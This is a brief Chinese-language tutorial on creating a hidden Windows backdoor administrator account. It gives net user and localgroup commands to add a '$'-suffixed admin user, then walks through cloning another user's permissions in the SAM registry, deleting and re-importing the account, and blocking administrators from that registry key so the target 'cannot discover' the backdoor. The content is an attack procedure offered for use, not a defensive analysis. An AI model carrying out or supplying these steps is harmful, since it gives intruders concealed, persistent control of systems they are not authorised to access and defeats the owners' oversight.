AI写作智能体 自主规划任务,支持联网查询和网页读取,多模态高效创作各类分析报告、商业计划、营销方案、教学内容等。 广告
[TOC] ## 原理 普通增加用户,会在net中显示,如果利用隐藏账户,会在管理当中显示用户,所以**利用注册表和隐藏用户配合使用,这样能够使得目标发现不了存在的后门账户** ## 利用 ~~~ 增加隐藏用户 net user hacker$ admin123! /add 加入管理员组 net localgroup administrators hacker$ /add 打开注册表 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 克隆权限 将需要克隆的用户(如lily),对应键值的F选项的权限信息替换掉 hacker$ 的权限信息 导出注册表 讲权限和用户名两个注册表导出 命令行删除账户 net user hacker$ /del 打开注册表,重新导入注册表 选择文件,导入,这样在重新利用刚刚创建的账户就可以登陆克隆的权限的用户 设置管理员不能放问该注册表 这样能够让自己的后门更加隐蔽,一般发现不了 ~~~